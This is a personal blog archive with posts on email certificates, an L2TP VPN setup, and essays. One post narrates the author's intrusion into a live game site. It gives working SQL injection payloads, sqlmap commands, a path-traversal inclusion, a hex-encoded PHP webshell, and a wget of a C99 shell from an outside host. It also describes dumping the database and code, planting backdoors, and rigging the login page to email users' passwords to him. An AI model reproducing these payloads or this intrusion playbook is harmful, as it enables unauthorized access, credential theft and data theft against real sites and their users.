AbiusX

Speaking Session at Tarbiat Moalem University

AbiusX — Tue, 03 Apr 2012 01:54:35 +0000

The next Monday, 21st Farvardin (Jalali) I’ll be having a speaking session at Tarbiat Moalem (aka Kharazmi) University, set up by my dearly respected professor, Dr. Ehsan Malekian.

I’ll be covering some aspects of Epistemology combined with theories and practices of information security, and a general discussion of what is yet to come.

The session is held at 10:00 AM at Computer Engineering Department, the computer site.

Hope to see you people there

P.S: Tarbiat Moalem university is located at Karadj city, Hesarak sq.

Certified E-Mail with Comodo and Thunderbird

AbiusX — Fri, 10 Feb 2012 19:15:02 +0000

This is intended to be a theoretical/practical tutorial on how to use email certificates to encrypt and digitally sign your emails. There are approximately 2 million emails transferred every hour, out of which 80% are spam, and the email world is really creepy, so I strongly recommend you to read the rest of this post.

First of all, let’s cover some theory. There are three Internet protocols involved in sending and receiving emails: SMTP, IMAP, POP

Simple Mail Transfer Protocol is the one responsible for sending emails. An email client – where you compose your email, set recipients, attach files, etc. – sends your email data to a mail server via SMTP. The protocol is fairly simple and the only things worth mentioning is that it can do that under SSL (encrypted connection to server to transfer mail) and use Password Authentication to separate accounts.

Pactical Scenario: GMail

Most of us have used GMail, via creating an account in gmail.com and logging in there. It is very important to know that gmail.com is GMail Client, and smtp.gmail.com is GMail Server. When you log into the GMail, you access its client application, and do your stuff there. Since both client and server applications are on the same machine (Google Servers), your work is quickly sent to the server, that’s why you usually don’t notice.

Everybody can setup a Mail Server on their machine. Famous mail server applications are Microsoft Outlook for Windows and Exim and Postfix for Linux machines. GMail uses neither and has a custom coded server. You don’t need to provide a password to a mail server, neither you have accounts there. You can send any email from any server to any server, i.e you can send email from admin@facebook.com with any body you want to me@abiusx.com. It’s just a packet of data with a name on it (just like ordinary mail).

Famous servers like GMail, that deal with millions of users and lots of spam, implement technologies that require you to login, have accounts and do things lawfully. Other servers don’t. Mail that doesn’t follow GMail and other famous mail server’s rules, are usually treated as spam.

Back to the theory

POP usually used as POP3, is the old-school mail receiving protocol. Mail client uses this protocol to download all mails from the server. The protocol is very handicapped and weak, much like FTP.

IMAP on the other hand is a pretty recent and powerful mail receiving protocol, so basically POP and IMAP are replacements of each other. There were days when not many mail servers provided IMAP to their clients, now almost every web server provides full IMAP support. GMail’s IMAP is accessible at imap.gmail.com (Keep in mind that this is the domain for IMAP protocol, and not HTTP, so heading your browser to it would not bring up anything)

* * *

Today, many important interactions are done electronically. You can even buy cars online, and all of this involves some emailing. The providers email you your balance sheet, your username/password, your instructions for your education, your contest results and many many other things.

Theory: The problem(s)

1. Now consider something bad happens, such as a hacker forges an email from your university, telling you that you’re fired and can not continue your education, or that you need to pay certain money to a certain bank account. You have no way of telling if it’s legit -sent by the university- or fake (remember, email is just mail in bytes, and as forge-able as mail).

2. The other bad thing that might happen is, eavesdroppers and even your mail provider, would read your mail and extract content form it. You can be quite certain that every picture, every piece of information, every Word document and everything else you send through GMail is deeply analyzed by Google and stored to be handed over to CIA, NSA, etc. It doesn’t matter if your own email is @gmail.com or your recipient’s, either way your email passes through GMail servers.

Even if you have your own Mail Server (like my mail.abiusx.com), when you send/receive email, your message is passed through many email posts around the globe, and they seem to do the same analysis.

Theory: The solution

To stop forgery, you need to actually prevent two things: Manipulation of your message headers (who it is from) and manipulation of your message content (what it contains).

Digital Signature, is the well known solution, which provides both Authenticity (proving who the signature really belongs to) and Integrity (not a single dot in the message is changed). The mechanics of Digital Signature are quite complex, yet they rely on Public Key Cryptography.

Public Key Cryptography, provides us with a system having a pair of keys, the Private Key, and the Public Key. Everything that is locked with either is only unlockable by the other, e.g if you encrypt a message with someone’s public key, the message can only be decrypted by his private key -which is in fact only in his own hands-.

Unfortunately, to use everything related to the Public Key Cryptography, we need to use PKI (Public Key Infrastructure), and to use PKI, we need to obtain a SSL Certificate (Which contains our information and our public key, but not our private key). SSL Certificates are considered a luxury and are quite expensive for individuals (approximately $100 a year for every single use case).

Fortunately, Comodo is providing free email certificates so that everybody can send digitally signed emails.

To handle the second problem, we need encryption. We have to encrypt our email body, in a way that only our final target can decrypt and read it. Since email is not live, we can’t agree on a particular key and transfer data encrypted with it, and more importantly, our target usually is not aware of us sending an email to him.

To encrypt the message in a way that only our specific target can read it, we need to have his public key (which is included in his certificate) and encrypt the message with it, ensuring that only he himself can decrypt it with his private key. Unfortunately, there is no online database having certificates of all emails, so we need a means to obtain our targets certificate before we can send him encrypted messages.

This is particularly easy, considering every digitally signed message contains a copy of signer’s certificate at the bottom, so if we are using a modern mail client (2010+, when S/MIME was standardized by IETF) and we receive a digitally signed email from someone, and we ourselves have a digital certificate (to sign our own messages), our mail client automatically stores that “someone’s” certificate so that from then on, we can send him encrypted emails.

Now enough with the theory babble, off to enjoying the real deal:

Practice: Let’s send and receive encrypted, signed email

First of all, we have to have a modern mail client. Unfortunately, neither GMail’s web-based client nor Yahoo’s web-based clients support S/MIME yet. I myself strongly recommend you to use the mighty Mozilla Thunderbird, the best mail client I have seen after Apple’s Mail (which only runs on a Mac).

After downloading Thunderbird, we can at least see if a message is digitally signed, and if it’s signature is valid or not. With GMail and Yahoo’s web based clients, we only see a downloadable smime.p7s file!

The first time Thunderbird stars up, it asks for your email account credentials. Keep in mind that you can not use free Yahoo mail with Thunderbird or any other mail client (other than Yahoo’s web site), since they do not provide free POP3 or IMAP. Any other mail service is fine. After you enter your email credentials, Thunderbird automatically lists all your email settings, folders, and messages. There are also plenty of options to suit your particular needs. Now whenever you receive new email, Thunderbird informs you and you can easily see it, without the need to open a browser or even go online.

Next step is, to obtain an email certificate for our own email address. As I stated earlier on this post, Comodo is providing them for free to encourage secure email practice at :

http://www.comodo.com/home/email-security/free-email-certificate.php

The only thing that you have to enter correctly there, is your email address. All other fields are mandatory for a X.509 Certificate but are not checked against anything. After you fill the form, an email is sent to you, containing a link to receive your certified certificate. I suggest you visit this link with Mozilla Firefox, it makes thing a hell lot easier.

You need to add this certificate to your system. If you’re using a Mac, it will be added to your Keychain, but on Windows, every application keeps it’s own list of certificates, the operating system also does the same. When you open the link in Firefox, a dialog pops up telling you that the certificate was successfully installed. Now you need to go to Tools -> Options -> Advanced -> Encryption -> View Certificates -> Your Certificates and select it from the list, click Backup and save it somewhere on your computer inside a .p12 file (PKCS#12 Protocol). You need ot provide a password to encrypt the file, since it contains your private key as well as your certificate. Keep in mind NOT TO give this file to anyone, or they can legitimately forge you.

Now in Thunderbird, Tools -> Options -> Advanced -> Certificates -> View Certificates -> You Certificates press Import and select the file you just exported. You need to enter the password you used to encrypt it now, and once it is imported into Thunderbird, you’re all set.

Now open a new mail window, click on the Security arrow in toolbar, click on “Digitally Sign This Message”. A seal icon is added to the bottom right of your message. You can’t encrypt your message yet, since you haven’t stored anyone else’s public key in your Thuderbird. I suggest you send me your signed email, and I’ll reply it with my signed email, so you will have my public key and can send me encrypted email afterwards.

Note: The first time you click on “Digitally Sign This Message” there’s a question asking you to setup certificates for your email address. Click yes and select your imported certificate from the list. This is necessary since Thunderbird can handle plenty of mail addresses at the same time, and has to know which certificate belongs to which one.

Have fun sending/receiving signed and sealed email!

How the browser MMO and CodeIgniter Hacked

AbiusX — Sun, 05 Feb 2012 16:33:24 +0000

This one is intended to be an educational/tutorial post on how I hacked an MMORPG web browser Persian game known as ~~Removed From Text~~ and along with it, the well known PHP framework CodeIgniter used for developing it. Reading this might help you learn a thing or two about information security.

First of all, you’re not encouraged at all to do anything against ~~Removed From Text~~.com or any other CodeIgniter powered website using this technique or any equivalent technique. I am a world-class professional hacker and it’s practically impossible to track my actions in the Internet, I use well implemented anonymity/privacy networks and BOTNETs to perform my tasks and infiltrate systems in a way that’s very hard to detect.

Defacing any website – for any purpose – and/or stealing its private data it’s a felony in international treaties and therefore is condemned highly. The intent of this article is only educational.

* * *

Finding the vulnerability

A few days ago, I visited ~~Removed From Text~~ to play an online web-based browser game which is purely Persian. I was well aware of the game and it’s developers, since I was the coordinator for their participation in 3rd Digital Media Fair of Tehran. I played for a while, and started thinking this might take a long time, so I decided to cheat.

Probing the site and its features for a while, I figured a SQL Injection vulnerability in it’s “Forgot Password” feature. It’s worthy of note that SQL Injection vulnerabilities are usually found in the least attended, most obsolete sections of a website. Like a small polling dialog, or a forgot password dialog.

The vulnerability which can be seen at http://~~Removed From Text~~.ir/main/forgetPassword by entering foo as username and 1′ morgh as the password, brings up the following dialog at http://uc.~~Removed From Text~~.com/index.php/forget/index :

A Database Error Occurred

Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘morgh” at line 1 SELECT `uid` FROM uc_users WHERE username=’foo’ and email=’1′ morgh’ Filename: /var/www/universalcommander/models/forgetmodel.php Line Number: 17

It’s actually a nice one, and seems to allow me to do visible SQL Injection attacks and pull out the entire application database, but it doesn’t (only because of a programmers bug which came to save them here), and I’ll describe the reason in a while. Googling around the error, makes one know that the infrastructure used in the site is in fact the famous PHP framework : CodeIgniter One might think that well-known highly-used PHP frameworks are bug free, but it’s not entirely true, as we shall see in the rest of this post. Replacing the entered email 1′ morgh with 1′ and 1=0 union select 1 – (note: there’s an space after — and also ‘ is a single quote, wordpress tends to change it) to peform union-bypass SQL Injection, results in the following error:

A Database Error Occurred

Error Number: 1222 The used SELECT statements have a different number of columns SELECT `uid` , `username`, `email` FROM uc_users WHERE username=’foo’ and email=’1′ and 1=0 union select 1 — ‘ Filename: /var/www/universalcommander/models/forgetmodel.php Line Number: 11

Oddly, this error is not about the same SQL query as above! This one is the same, but with the difference that it asks for 3 columns as result. This makes us unable to perform union bypassing, since one of the queries asks for 1 column and the other asks for 3, and we can only inject both in the same way, and we can’t ask for select 1,2,3 and select 1 at the same time (union requires both sides to have equal columns). Unfortunately, the programmers here have done something not logical which has prevented us from hacking this system and left us with only a Blind Injection vulnerability. Blind injections are much weaker and much slower, yet employing a powerful tool such as SQLMap I was able to run every SELECT query I desired on the server.

Exploiting the vulnerability

Since CodeIgniter filters all dangerous characters in a HTTP GET request, I only probed for POST vulnerabilities. The one described above is also a POST SQL Injection vulnerability. To use POST vulnerabilities in SQLMap, you have to provide it with a HTTP Request file:

POST http://uc.~~Removed From Text~~.com/index.php/forget/index HTTP/1.1

Host: uc.~~Removed From Text~~.com

User-Agent: Mozilla/4.0 username=abiusx&email=hacked@abiusx.com

With the following command line:

sudo python sqlmap.py -r requestfile.txt –sql-query=”PUT YOUR QUERY HERE” –dump

And SQLMap will do the rest, namely using blind injection to return result of your query. You can also use –tables, –databases, –passwords and etc. switches to ask SQLmap to list appropriate database stuff for you.

Sapping some critical data

At this point, there are two kinds of information that are of extreme value for us to continue elevating ourselves. First are username/passwords and second are session information. Other types of data are not of much value since we can only perform SELECT queries and can’t change anything in the database. We have to seek administrator users and get our hands on their passwords, so that we can elevate ourselves and infiltrate the system in an administrative layer.

There is a well-established security practice, that you have to only store hashes of passwords (which is a one-way digest of the password) in your database, and not the actual passphrases. Hashes are meant to be irreversible back to passwords, and every time a user tries to login, the hash is generated again and compared against the hash available in the database. Unfortunately, most Iranian developers don’t respect this practice and store the original passwords, thus hackers finding a simple SQL Injection are able to know all the passwords of all the users, and it’s a proven fact that, most users use the same password everywhere.

This was not the case though, and ~~Removed From Text~~ developers used hashes, and not only weak hashes such as MD5 (which are irreversible), they used strong hashes such as SHA512 with Salting, so that a hacker could not know password from hashes. To harden my practice, my favorite supercomputing service for breaking hashes (passcracking.ru) was also unavailable at the time. Failed to acquire some passwords, I headed to get some session information. First I logged into the website with my own user, changed my IP, and refreshed the page. Bingo, the site does not force IP Validation, so I can log in as any other user, while he/she is also logged in, and system won’t notice. To do some Session Hijacking all I needed was a SessionID. I reaped through all database tables, searching for sessions, but found none. This amazed me so much, as nobody keeps sessions in files these days, that I started doubting I’m hacking the right server.

My share of disappointment

I checked count of users, and it matched. I checked some other stuff and it seemed that some game information is not available in any of the databases, and there were many databases. That’s when I started doing this in terminal:

dig s2.~~Removed From Text~~.ir

dig s4.~~Removed From Text~~.ir

dig ~~Removed From Text~~.com

Bingo! These sites are not hosted on the same server. I was hacking the wrong server all this time! I switched to the other server, which was the actual game server, and found out that the “ForgotPassword” feature is protected by a reCAPTCHA. Now I was doomed, since blind injections won’t work with CAPTCHAs.

But I wouldn’t give up, since if there’s a single vulnerability in a website, there is indeed another.

Seeking some other obsolete features of the website, I figured out that they have i18n (Internationalization) and provide both English and Persian versions of the website. i18n is a very tricky feature and since it’s not used widely and tested well enough, usually has bugs here and there.

I did some WebScarab on the i18n feature, and figured out that when I click the Iran flag, it sends “FA” to the server and when I click the UK flag, it sends “EN”. Well what if I sent something else intentionally? I used FireBug+FireCookie to change my “Language” cookie from “Farsi” to “Morgh”, since the application seemed to keep language preferences in the cookie, and voila:

An Error Was Encountered

Unable to load the requested language file: language/morgh/general_lang.php

What does it mean? It means that language phrases are stored in files in the appropriate language folder, e.g “farsi ” sentences are stored in “language/farsi/*”. This error opens up the possibility of a File Inclusion attack. From the previous error I figured that files are stored in /var/www/~~Removed From Text~~/application/language/farsi/. Now all I had to do was to store my desired code somewhere in the server (the hard part) and point the language loader to it. This time I changed the language from morgh to ../../../../../tmp/ so that the absolute language path would become:

/var/www/~~Removed From Text~~/application/language/../../../../../tmp/general_lang.php

Which is in fact in terms of operating system paths:

/tmp/general_lang.php

I chose /tmp since it has full write accesses for everyone, and I could put some file there much easier.

MySQL is much better than MS SQL, yet not impenetrable

As I told you before, I couldn’t do some blind injection to enumerate database information, but I could still run SQL queries. Out of all possible queries, I chose this injection:

‘ and 1=0 union select “

This one is very tricky, what is does is, it uses union bypass on the first query (remember, the second programmer’s bug – aka query – expected 3 columns) to store the string as the result of a SQL query into the file “/tmp/general_lang.php”. The string is actually a valid PHP code, that runs everything it receives in the operating system terminal (they used Ubuntu). This query also pops the same error we got on our first server, but this time it does its trick and makes the file. Now I simply refreshed my login page’s source code, only to encounter the following:

0 <?php echo shell_exec($_REQUEST[q])

It seems that CodeIgniter had some other tricks up it’s sleeve, it changed < and ( ) characters to their equivalent HTMLEntities to prevent XSS and similar attacks. It actually took me a while to figure out it was the framework’s doing, I was thinking I made some mistakes first.

Breaking the habbit

The good news was, I knew a way to bypass it. The bad news was, the /tmp/general_lang.php already existed and I couldn’t use MySQL’s into outfile to overwrite it. The other good news were, I still had a limited number of tries, since the application used a bunch of language files, not only “general_lang.php”. This time, I used an online string to hex tool to get the hex equivalent of my supposed PHP code “

‘ and 1=0 union select unhex(“3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29″) into outfile “/tmp/races_lang.php” –

This time, the mighty CodeIgniter could not filter my hex-encoded parameter so it left it as is, and MySQL took care of decoding it back to the actual code via unhex() function. Now I had a functional terminal access to the server, although with a limited user such as www-data. The rest of the process is piece of cake, yet I will describe it to you.

Eating the Cake

I used the following commands to find a suitable spot to upload my actuall shell:

ls -la /var/www

Result was:

-rwxrwxr-x 18 root root 4096 Feb 4 11:10 index.php -rwxr-xr-x 22 root root 4096 Feb 4 12:25 repairing.php drwxrwxr-x 1 root root 0 Jan 2 12:31 system

drwxr-xr-x 5 root root 4096 Feb 5 15:11 ~~Removed From Text~~ drwxr-xr-x 21 root root 4096 Oct 20 15:33 ~~Removed From Text~~Game2-- drwxr-xr-x 3 root root 4096 Oct 12 15:38 ~~Removed From Text~~Game2~~ lrwxrwxrwx 1 root root 8 Sep 4 13:15 IptV -> ~~Removed From Text~~ drwxrwxrwx 10 sshadmin sshadmin 4096 Jan 2 12:54 azOld drwxrwxrwx 8 root root 4096 Feb 4 05:21 azpanel drwxrwxrwx 10 root root 4096 Oct 19 19:55 chat. drwxr-xr-x 2 root root 4096 Oct 15 14:00 email igniter drwxrwxrwx 7 root root 4096 Feb 4 05:16 help drwxrwxrwx 5 www-data www-data 4096 Oct 26 19:54 helptest drwxrwxrwx 4 www-data www-data 4096 Oct 19 19:28 help~ -rwxrwxr-x 1 root root 177 Sep 4 2010 index.html drwxr-xr-x 7 root root 4096 May 30 2011 register~ drwxr-xr-x 2 www-data www-data 4096 Feb 4 04:10 s5 drwxrwxrwx 4 root root 4096 Feb 5 18:56 s5b drwxr-xr-x 4 root root 4096 Jul 6 2011 store-- drwxrwxrwx 3 www-data www-data 4096 Aug 2 2011 tools -rwxrwxr-x 1 root root 7491 Sep 9 2010 webmin.log drwxrwxrwx 7 root root 4096 Feb 4 12:29 wordpress

Those folders who have “www-data” as owner, are totally workable for me. Also those with the access “rwxrwxrwx” have full write accesses for everybody, so I could also do my stuff in them. Let’s assume I used the folder “help”, which is accessible via the URL help4.~~Removed From Text~~.ir. How did I figure that out? Simply by reading the files in /etc/apache2/sites-enabled/ with my tool and the command cat /etc/apache2/sites-enabled/*. Now I used the following command to upload C99 (web-based terminal) to the server:

wget “http://www.Sh3LL.org/c99.txt?” -O /var/www/help4/shell.php

And simply access my beloved C99 shell at http://help4.~~Removed From Text~~.ir/shell.php . Now I headed for what I was most enthusiastic about, the source code of the online game! I’m one of top Iranian PHP developers, and I could develop an online MMORPG easily, but that would require lots of time and money, so I was eager to get my hands on their code, both to know what they did and to know their mistakes and help them back. I did the following commands to compress the whole /var/www folder and make it accessible via web, then downloaded it on my PC:

tar -zcvf /var/www /tmp/code.tar.gz # takes a few minutes, its 500 MB

ln -s /tmp/code.tar.gz /var/www/help/code.tar.gz

Then I removed the code (or maybe I forgot to?). Now I wanted the whole database to be able to run the game on another server, presumable my own system, but I needed MySQL root password for that. Don’t panic, the ~~Removed From Text~~ team made it easy, they had to put username/password of the database in /var/www/~~Removed From Text~~/application/config/database.php, and they intended to use root for their game, so I took the password from the file, and did the following:

mysqldump -u root -pROOTPASS –all-databases | gzip > /tmp/mysql.tar.gz ln -s /tmp/mysql.tar.gz /var/www/help/mysql.tar.gz

And downloaded the whole MySQL data to my system as well (570 MB). The next step I took, was to change plenty parts of the source code, to allow me to cheat. For example, I put some backdoors to build my builds in less than a second, some to full my pool of resources, some to add money to me, and etc. The final step, was to obtain list of user passwords. Since there were 17000 users on the database, and their passwords were salted and SHA hashed, I didn’t dare pay for a supercomputer to break all of them, instead I changed the login script of the ~~Removed From Text~~ to email a copy of the username/password whenever a user logs into the system, and I have obtained 5000 username/password pairs since then.

Epilogue

The tutorial described in this post, was actually performed by me. Some of the steps required lots of thinking and caution, to prevent me from being tracked and to prevent my chances being ruined (like in language files scenario). I have to disappoint you right here and now, by telling you that I contacted the ~~Removed From Text~~ team and patched their software, so that it’s not insecure anymore (after all, I’m a white-hat). I also forked my access to many parts of the server, notably SSH user/passwords, SVN credentials and other critical information so that under no circumstances, any security expert other than me could patch the server against my access. Have fun learning Information Security!

سندهای آموزشی مهندسی اینترنت

AbiusX — Fri, 03 Feb 2012 17:47:26 +0000

ترم پیش که حل تمرین مهندسی اینترنت بودم یک سری سند آموزشی توسط بچه‌هایی که پروژه تحقیقاتی رو انتخاب کرده بودند مهیا و سر هم شد. بالاخره بعد از چندین ماه گلچین و آپلود کردم و همشون در آدرس زیر قرار دارند. لیست این مقالات گلچین شده رو هم در ادامه مطلب قرار می‌دم:

http://abiusx.com/ta/sbuie89b/project/research

بررسی برخی از پروتکل‌های معمول در اینترنت
آرمین بلقدر، مسعود فیروزآبادی

پروتکل‌های معمول اینترنت
و لایه کاربرد
فاطمه آرزومند

اینترنت و پروتکل‌های رایج در آن
ریحانه امیر‌ابادی فراهانی

پروتكلها و تكنولوژيهاي مورد استفاده در وب (بخش اول)
آرمین بلقدر، مسعود فیروزآبادی

پروتکل‌های معمول اینترنت (و پروتکل‌های لایه کاربرد)
المیرا نظام‌فر

وب 2، دلایل پيدايش، ويژگيها و چشم‌انداز
فاطمه الیاسی

وب ۲
زهرا وحیدی فردوسی

آژاکس
آرمین بلقدر، مسعود فیروزآبادی

آموزش آژاکس
زهرا حسینی، الهه جلمبادانی

آموزش CSS
فرهنگ حسینی، مهدی جزایری

آموزش CSS
زهرا حسینی، الهه جلمبادانی

پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب
المیرا نظام‌فر

پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب
فاطمه آرزومند

پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب
فاطمه دشتی

پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب
مهران گلی

پروتکل‌های اینترنت
مرضیه کریمی نوری

وب ۲
ریحانه امیرآبادی فراهانی

پروتکل‌های اینترنت
رزیتا رحیمی

آموزش جاواسکریپت
زهرا حسینی، الهه جلمبادانی

آموزش پی اچ پی
زهرا حسینی، الهه جلمبادانی

زبان‌های پردازه‌نویسی تحت سرور
آرمین بلقدر، مسعود فیروزآبادی

آشنایی با وب ۲ و رویکردهای آن
آرمین بلقدر، مسعود فیروزآبادی

بانک‌های اطلاعاتی سرور
آرمین بلقدر، مسعود فیروزآبادی

سرورهای وب
زینب عباسی مزار

L2TP on Ubuntu 10.04 LTS

AbiusX — Tue, 10 Jan 2012 21:59:29 +0000

This post is a tutorial on how to run a L2TP over IPSec VPN Server for proxy purposes on a Ubuntu 10.04 LTS Server machine. Before we start the practice, let us review some theories:

What is VPN?

Virtual Private Network, is a technology, mainly developed to provide creation of virtual local networks with a wide geographic distribution. For example, we have a data-center and a considerable network in Bandar Abbas that requires constant maintenance and connectivity to our main servers and offices back in Tehran. We need a local network which consists of our office networks and the Bandar Abbas network, but since they are geographically distributed, we can’t have them local, so we cheat and virtually create a private (local) network, hence VPN.

Specifically speaking, we start a VPN server on our Bandar Abbas hub server (main.rajaei.abx.ir), then create a VPN connection from our computer (or router) and connect to it, and it would be like we have just plugged an Ethernet cable into our system, directly connected to whole Bandar Abbas network. After that we could simply connect to our surveillance server at 192.168.0.220 (which is a Bandar Abbas network IP, not ours) via any application.

As you might’ve already guessed, since VPN is usually established over the Internet, the most important thing to expect is data transmission security. No third party on the route should be able to sniff on our corporates data, right? VPN security is almost the main issue.

Then what is PPTP, L2TP, IPSec, SSTP, etc. ?

VPN, is a concept. It’s also a technology, but many protocols and mixtures of technologies tend to provide such means. The simplest form is PPTP, the point to point tunneling protocol. It is easily established, easily connected and fast. To setup a PPTP server on Ubuntu, you need less than 5 minutes. The problem with PPTP is data encryption. To encrypt data with PPTP, both parties (VPN Client and Server) have to agree on an encryption key, and any hacker listening while they are discussing it, would be able to read their transfers.

Then there comes OpenVPN, which is totally open source and good, but since there’s no native client on Windows, no body actually uses it. SSTP is also only Windows based, which is based on SSL Tunnels, very like the IPSec underlying layer of L2TP.

The other mostly used VPN technology, is L2TP, which relies on IPSec (lower network layer protocol) for its security. IPSec is a protocol which uses PKI (Public Key Infrastructure), or PSK (Pre-Shared Keys) which both are means to establish Zero-Knowledge connections securely without a third party being able to guess the password.

L2TP is technically called L2TP over IPSec, which is because first IPSec establishes a secure connection between two systems, then layer 2 tunneling protocol takes over for the networking and VPN functionality.

VPN as a means of proxy

In many cases, VPN is used for bypassing certain limitations and/or privacy, as proxy servers are used. Since VPN establishes a low level networking, proxies based on a VPN proxy all sorts of network connections, not just the web or videos. Anything, from peer to peer connections to DNS lookups are performed over the VPN.

To use a VPN for proxy purpose, we simply need to connect to a VPN far away (usually outside filtering region, if we are trying to bypass regional filtering) and use their internet connection. It is as if out Internet gateway, is not our own modem, but the computer over at the VPN.

VPN technologies (all PPTP, L2TP, SSTP, OpenVPN, etc.) work on certain ports and use certain traceable technologies. So blocking VPN usage is pretty simple, as PPTP no longer works more than a few seconds in Iran.

But with SSTP and L2TP, since both use a lower level encryption methodology (IPSec for L2TP), they can not be easily blocked. You might think that it would be pretty easy to prevent all IPSec connections and thus stop L2TP, as well as SSL for SSTP, but the case is, IPSec and SSL are used for all forms of encryption. When you use a banking service on the Internet, you employ SSL. When you transfer a file securely over the network, you employ IPSec. Blocking them would stop half of the Internet functionality.

There’s also no way of peeking into IPSec or SSL encrypted data (which contain the actual VPN packets), hence L2TP and SSTP services could not be stopped that easily.

Lets get dirty

Now I’m going to provide you with instructions on how to setup and use a L2TP VPN on your Ubuntu server for proxy purpose.

First of all, install a few packages:

sudo apt-get install ppp xl2tpd openswan

After having all the necessary daemons, assuming your server’s IP address is 178.162.154.252 (which is actually abiusx.com’s), put the following in /etc/ipsec.conf file

version 2.0

config setup
nat_traversal=yes
virtual_private=%v4:10.0.0.0/8,%v4:192.168.1.0/16,%v4:172.16.0.0/12
oe=off
protostack=netkey

include /etc/ipsec.d/l2tp-psk.conf

Then open up /etc/ipsec.d/l2tp-psk.conf and put the following in it, don’t forget to replace my IP with yours:

conn L2TP-PSK-NAT
rightsubnet=vhost:%priv
also=L2TP-PSK-noNAT

conn L2TP-PSK-noNAT
authby=secret
pfs=no
auto=add
keyingtries=3
rekey=no
type=transport
left=~~178.162.154.252~~
leftnexthop=~~178.162.154.1~~
leftprotoport=17/1701
right=%any
rightprotoport=17/%any
dpddelay=15
dpdtimeout=30
dpdaction=clear

You also need to open /etc/ipsec.secrets and put your pre-shared secret (e.g 123456789) in it:

~~178.162.154.252~~ %any: PSK “123456789″

Now restart IPSec, and watch your /var/log/auth.log and you’re done for IPSec on the server. On the client (preferably a Windows machine), create a VPN connection, on its properties dialog, in security tab, there’s “IPSec Settings” which asks you for the pre-shared secret. Provide 123456789. On the networking tab, from Type of VPN, select L2TP IPSec VPN. Now connect and inspect your server:

sudo service ipsec restart
sudo tail -f /var/log/auth.log

You should see something like “IPsec SA established” in middle of some logs, that means IPSec was successfully established. Of course the VPN connection will fail since we haven’t setup L2TP part yet.

L2TP Setup

Now we need to configure xl2tpd, there are three files we need to change, two are xl2tpd config files, and one is username/password file. Let’s start with /etc/xl2tpd/xl2tpd.conf which should have the following:

[global]
ipsec saref = yes
[lns default]
ip range = 192.168.1.231-192.168.1.239
local ip = 192.168.1.230
refuse chap = yes
refuse pap = yes
require authentication = yes
ppp debug = yes
pppoptfile = /etc/ppp/options.xl2tpd
length bit = yes

Then off to /etc/ppp/options.xl2tpd which would have:

require-mschap-v2
ms-dns 192.168.1.1
asyncmap 0
auth
crtscts
lock
hide-password
modem
debug
name l2tpd
proxyarp
lcp-echo-interval 30
lcp-echo-failure 4

And finally /etc/ppp/chap-secrets which contains username/password pairs:

username l2tpd 1234 192.168.1.231
l2tpd username 1234 192.168.1.231
user2 l2tpd 123 *

Since the * format crashes on some versions of xl2tpd, preferably use the static user/ip method. To wrap things up, /etc/sysctl.conf should contain “net.ipv4.ip_forward = 1″ which enables IP Forwarding. If you just added it, do a networking restart or system reboot.

Oh and you might need to do some routing to route VPN IPs to your gateway.

Have fun using L2TP over IPSec.

The Cynic and the Condemned

AbiusX — Sun, 01 Jan 2012 18:51:59 +0000

Well, I know for a fact that I’m a cynic. But I wanted to have a definition for it, so I took a peek at the Internet. The sweet Wikipedia had some definition, totally irrelevant of the popular culture, based on some old Greek Philosophy practicing Areté.

Finally I found some interesting matching definitions on wiki.answers.com :

What is the difference between a cynic and an idealist?

A cynic is someone who fails to thrive, who picks apart good ideas and has a tendency to make life boring and miserable for himself and others. They do not see the purpose of success. They do not get excited. They do not understand where the passion of others comes from. Idealists are dreamers of success and have a potential to succeed. They have grand dreams of things they are interested in and work hard to see them come to light. If they fail, they can quite easily become cynics themselves. Many might argue that a cynic is simply an idealist who has experienced failure. In other words, you must first be an idealist before you have the capacity to be cynical.

And also, a few interesting quotes on the subject, which I really enjoyed :

“The cynic is one who never sees a good quality in a man, and never fails to see a bad one. He is the human owl, vigilant in darkness and blind to light, mousing for vermin, and never seeing noble game. The cynic puts all human actions into two classes – openly bad and secretly bad.” Henry Ward Beecher

“A cynic is a man who, when he smells flowers, looks around for a coffin.”
H. L. Mencken

“A cynic is not merely one who reads bitter lessons from the past, he is one who is prematurely disappointed in the future.” Sidney J. Harris

And for the end an example of a cynical statement:

“In the depths of my heart I can’t help being convinced that my dear fellow-men, with a few exceptions, are worthless.” Sigmund Freud

Why liberalism only suits US

AbiusX — Wed, 28 Dec 2011 00:55:53 +0000

This is People’s Republic of China, an old man is headed into a banking establishment to do some everyday bank tasks. The bank is quite crowded, but after a few minutes it’s finally his turn to take up the booth. He seems pretty slow with papers and also isn’t the sharpest when answering the bank employee’s questions, and this has been going on for a while.

The young lady who has entered the bank a few seconds after the old man, is growing impatient with the old man’s progress. She’s next, but it doesn’t seem like her turn will be coming up soon. Also, there aren’t any empty booths as there aren’t many functional booths available in the bank, and even if they were, they might’ve been occupied as well.

She couldn’t switch banks, since other banks are also pretty crowded and the switching process would probably consume more time than she’s gonna end up waiting for her turn in a lifetime of bank chores. After all, there are rarely enough banks for all of people in China, as in almost any other country.

While taking her time to wait, the bright women is fantasizing something in her head :

This is the United States, an old man goes into a bank to pay some bills. Since the bank is almost empty, as soon as he enters the bank, the booth accepts him. The man has around 30 bills and is quite slow doing paperwork, so he’s gonna take at least 45 minutes.

Another customer, a young woman also enters the bank. She seems impatient, and seeing the old man taking his time is boring her. Fortunately, there are plenty of other empty booths waiting for other customers, and even if there weren’t, she could easily switch banks and choose another eager one with plenty of room for new customers. After all, there are many more banks than people actually need in the US.

Liberalism is pretty delicious, ain’t it?

Thinking of all that, our lady realizes the old man has made only a little progress. She’s wondering what is the right thing to do in a situation like this, to put the old man at the back of the waiting line, since his task requires considerable time, or let him do whatever he requires in his own turn.

The second idea, however liberal it might sound, is starting to seem dull and inefficient to the lady, and amazingly the first one is the course of action she chooses as best fitting.

After all, Liberalism ain’t that suiting for everybody, is it?

نحوه فیلترینگ در ایران و نقاط ضعف آن

AbiusX — Sun, 31 Jul 2011 02:22:58 +0000

نکته: ضعف معرفی شده در این مطلب از دی‌ماه ۱۳۹۰ توسط تیم فیلترینگ رفع گردیده است و این مطلب صرفا کاربرد آموزشی-فنی دارد.

